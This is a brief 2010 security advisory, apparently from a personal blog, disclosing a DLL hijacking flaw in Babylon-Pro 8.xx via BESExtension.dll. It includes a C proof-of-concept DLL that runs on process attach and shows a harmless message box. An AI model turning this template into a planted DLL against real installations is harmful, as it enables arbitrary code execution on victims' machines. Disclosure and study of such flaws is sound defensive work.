Babylon-Pro 8.xx DLL Hijacking

============ { Advisory 22/11/2010 } =============

Vulnerable Dll: BESExtension.dll

Tested on: Windows 7 x32 and Windows xp sp3 x32
#include <windows.h>

BOOL WINAPI DllMain ( HANDLE hinstDLL,  DWORD fdwReason, LPVOID lpvReserved)

{

switch (fdwReason)

{

case DLL_PROCESS_ATTACH:

exploit();

case DLL_THREAD_ATTACH:

case DLL_THREAD_DETACH:

case DLL_PROCESS_DETACH:

break;

}

return TRUE;

}

int exploit()

{

MessageBox(0, “Hijacked!!!”, “DLL Message”, MB_OK);

}

Credits:

# Discoverd By: Locu

# Website: http://xlocux.wordpress.com

# Contacts: xlocux[-at-]gmail.com

================== { EOF } =====================

About these ads

One comment

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s